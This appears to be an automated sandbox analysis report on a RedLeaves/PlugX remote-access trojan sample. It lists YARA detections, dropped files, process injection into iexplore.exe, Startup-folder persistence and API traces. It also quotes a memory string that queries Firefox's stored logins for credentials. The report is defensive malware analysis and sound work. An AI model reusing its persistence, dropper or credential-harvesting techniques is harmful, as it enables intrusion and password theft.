Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTRMatched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTRMatched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTRMatched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTRMatched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTRMatched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTRMatched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTRMatched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTRMatched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTRMatched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat, type: DROPPEDMatched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat, type: DROPPEDMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, type: DROPPEDMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, type: DROPPEDMatched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00A539D20_2_00A539D2
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00AADB4F0_2_00AADB4F
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00ABECDC0_2_00ABECDC
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_004826181_2_00482618
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_004847E41_2_004847E4
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0045893C1_2_0045893C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0043AC9C1_2_0043AC9C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_004770741_2_00477074
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0045DB801_2_0045DB80
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_6EDA0F491_2_6EDA0F49
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_6EDA0B771_2_6EDA0B77
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_6EDA07D91_2_6EDA07D9
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_030292462_2_03029246
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0302D2F52_2_0302D2F5
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0300312C2_2_0300312C
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0300B0532_2_0300B053
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_030197742_2_03019774
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0302962E2_2_0302962E
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_030286412_2_03028641
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0300E6C72_2_0300E6C7
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0300E4BC2_2_0300E4BC
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_03028AD62_2_03028AD6
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0302D8462_2_0302D846
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0302FE652_2_0302FE65
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_03028E742_2_03028E74
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0302CDA42_2_0302CDA4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_03022DC82_2_03022DC8
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_0302EC5B2_2_0302EC5B
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B4E4282_2_04B4E428
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B685AD2_2_04B685AD
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B6959A2_2_04B6959A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B68DE02_2_04B68DE0
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B6FDD12_2_04B6FDD1
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B62D342_2_04B62D34
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B6CD102_2_04B6CD10
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B596E02_2_04B596E0
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B4E6332_2_04B4E633
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B6D7B22_2_04B6D7B2
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B4AFBF2_2_04B4AFBF
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B430982_2_04B43098
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B691B22_2_04B691B2
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B6D2612_2_04B6D261
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B68A422_2_04B68A42
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B6EBC72_2_04B6EBC7
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_004826183_2_00482618
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_004847E43_2_004847E4
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0045893C3_2_0045893C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0043AC9C3_2_0043AC9C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_004770743_2_00477074
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0045DB803_2_0045DB80
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_6EE60F493_2_6EE60F49
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_6EE60B773_2_6EE60B77
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_6EE607D93_2_6EE607D9
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_6EE603443_2_6EE60344
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: String function: 00403FD0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: String function: 00404A64 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: String function: 0047FD7C appears 50 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: String function: 00404A40 appears 183 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: String function: 00403BF0 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: String function: 004070D0 appears 126 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: String function: 004104E4 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: String function: 0040F294 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: String function: 0040A164 appears 106 times
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: String function: 00AAD340 appears 37 times
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: String function: 00AAD232 appears 122 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 030240C4 appears 39 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 04B64030 appears 39 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B4F8FF DuplicateTokenEx,Wow64DisableWow64FsRedirection,CreateProcessAsUserW,GetLastError,Wow64RevertWow64FsRedirection,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,2_2_04B4F8FF
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_004637A8 NtdllDefWindowProc_A,1_2_004637A8
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0045893C GetSubMenu,SaveDC,RestoreDC,73BEB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,1_2_0045893C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00448B44 NtdllDefWindowProc_A,GetCapture,1_2_00448B44
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0043AFAC NtdllDefWindowProc_A,1_2_0043AFAC
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00463F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,1_2_00463F4C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00463FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,1_2_00463FFC
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_004637A8 NtdllDefWindowProc_A,3_2_004637A8
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0045893C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,3_2_0045893C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00448B44 NtdllDefWindowProc_A,GetCapture,3_2_00448B44
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0043AFAC NtdllDefWindowProc_A,3_2_0043AFAC
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00463F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,3_2_00463F4C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00463FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,3_2_00463FFC
Source: cANdLlHS4N.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cANdLlHS4N.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cANdLlHS4N.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cANdLlHS4N.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: obedience.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cANdLlHS4N.exeVirustotal: Detection: 77%
Source: cANdLlHS4N.exeMetadefender: Detection: 64%
Source: cANdLlHS4N.exeReversingLabs: Detection: 84%
Source: cANdLlHS4N.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cANdLlHS4N.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\cANdLlHS4N.exe "C:\Users\user\Desktop\cANdLlHS4N.exe"
Source: C:\Users\user\Desktop\cANdLlHS4N.exeProcess created: C:\Users\user\AppData\Local\Temp\obedience.exe C:\Users\user\AppData\Local\Temp\obedience.exe
Source: C:\Users\user\AppData\Local\Temp\obedience.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\obedience.exe "C:\Users\user\AppData\Local\Temp\obedience.exe"
Source: C:\Users\user\AppData\Local\Temp\obedience.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: C:\Users\user\Desktop\cANdLlHS4N.exeProcess created: C:\Users\user\AppData\Local\Temp\obedience.exe C:\Users\user\AppData\Local\Temp\obedience.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persuasion.lnkJump to behavior
Source: C:\Users\user\Desktop\cANdLlHS4N.exeFile created: C:\Users\user\AppData\Local\Temp\obedience.exeJump to behavior
Source: obedience.exe.0.drBinary string: \Device\
Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@0/3
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_009A13B0 _memset,_memset,_memset,_memset,_memset,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,SHGetSpecialFolderPathA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,_strrchr,lstrcpyA,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,Sleep,0_2_009A13B0
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_004099C2 GetDiskFreeSpaceA,1_2_004099C2
Source: obedience.exe, 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, obedience.exe, 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: select hostname, encryptedUsername, encryptedPassword from moz_logins where hostname like "moz-proxy://%s%%";
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00426E50 GetLastError,FormatMessageA,1_2_00426E50
Source: C:\Users\user\AppData\Local\Temp\obedience.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_009A12C0 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,0_2_009A12C0
Source: C:\Users\user\Desktop\cANdLlHS4N.exeMutant created: \Sessions\1\BaseNamedObjects\cplusplus_me
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_009B508E FindResourceA,LoadResource,FreeResource,0_2_009B508E
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: cANdLlHS4N.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: cANdLlHS4N.exeStatic file information: File size 3804160 > 1048576
Source: cANdLlHS4N.exeStatic PE information: section name: RT_CURSOR
Source: cANdLlHS4N.exeStatic PE information: section name: RT_BITMAP
Source: cANdLlHS4N.exeStatic PE information: section name: RT_ICON
Source: cANdLlHS4N.exeStatic PE information: section name: RT_MENU
Source: cANdLlHS4N.exeStatic PE information: section name: RT_DIALOG
Source: cANdLlHS4N.exeStatic PE information: section name: RT_STRING
Source: cANdLlHS4N.exeStatic PE information: section name: RT_ACCELERATOR
Source: cANdLlHS4N.exeStatic PE information: section name: RT_GROUP_ICON
Source: cANdLlHS4N.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x134a00
Source: cANdLlHS4N.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1f0200
Source: cANdLlHS4N.exeStatic PE information: More than 200 imports for USER32.dll
Source: cANdLlHS4N.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: cANdLlHS4N.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cANdLlHS4N.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cANdLlHS4N.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cANdLlHS4N.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cANdLlHS4N.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00AAD385 push ecx; ret 0_2_00AAD398
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00AAD30A push ecx; ret 0_2_00AAD31D
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00450214 push 004502A1h; ret 1_2_00450299
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0048A028 push 0048A054h; ret 1_2_0048A04C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_004660E8 push 00466114h; ret 1_2_0046610C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0043E0F8 push 0043E124h; ret 1_2_0043E11C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00482094 push ecx; mov dword ptr [esp], edx1_2_00482099
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00486158 push 00486184h; ret 1_2_0048617C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00466120 push 0046614Ch; ret 1_2_00466144
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0043018C push 004301B8h; ret 1_2_004301B0
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_004501AC push 00450212h; ret 1_2_0045020A
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00488254 push 00488280h; ret 1_2_00488278
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0043E260 push 0043E28Ch; ret 1_2_0043E284
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0048821C push 00488248h; ret 1_2_00488240
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0048A310 push 0048A33Ch; ret 1_2_0048A334
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_004205FC push ecx; mov dword ptr [esp], edx1_2_004205FE
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0048A5A4 push 0048A5D0h; ret 1_2_0048A5C8
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0041867C push ecx; mov dword ptr [esp], eax1_2_0041867D
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00466714 push 00466757h; ret 1_2_0046674F
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_004188E0 push ecx; mov dword ptr [esp], edx1_2_004188E5
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0041C968 push ecx; mov dword ptr [esp], edx1_2_0041C96A
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0048A9C0 push 0048A9ECh; ret 1_2_0048A9E4
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0042CA4C push 0042CB1Ch; ret 1_2_0042CB14
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0048CA34 push 0048CA60h; ret 1_2_0048CA58
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00466B78 push 00466BA4h; ret 1_2_00466B9C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00406B08 push 00406B59h; ret 1_2_00406B51
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00418B08 push ecx; mov dword ptr [esp], edx1_2_00418B0D
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00430B10 push 00430B5Fh; ret 1_2_00430B57
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00416BD4 push 00416C21h; ret 1_2_00416C19
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00466BE8 push 00466C14h; ret 1_2_00466C0C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00466BB0 push 00466BDCh; ret 1_2_00466BD4
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00AC046C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00AC046C
Source: StarBurn.dll.0.drStatic PE information: real checksum: 0x29839 should be: 0x293b5
Source: C:\Users\user\Desktop\cANdLlHS4N.exeFile created: C:\Users\user\AppData\Local\Temp\obedience.exeJump to dropped file
Source: C:\Users\user\Desktop\cANdLlHS4N.exeFile created: C:\Users\user\AppData\Local\Temp\StarBurn.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persuasion.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persuasion.lnkJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon2060.png
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_009A836B IsWindowVisible,IsIconic,0_2_009A836B
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00463830 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00463830
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0044A290 IsIconic,GetCapture,1_2_0044A290
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00460740 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_00460740
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0044AB44 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_0044AB44
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0044B468 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_0044B468
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0042D738 IsIconic,GetWindowPlacement,GetWindowRect,1_2_0042D738
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00463F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,1_2_00463F4C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00463FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,1_2_00463FFC
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00463830 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,3_2_00463830
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0044A290 IsIconic,GetCapture,3_2_0044A290
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00460740 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,3_2_00460740
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0044AB44 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_2_0044AB44
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0044B468 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,3_2_0044B468
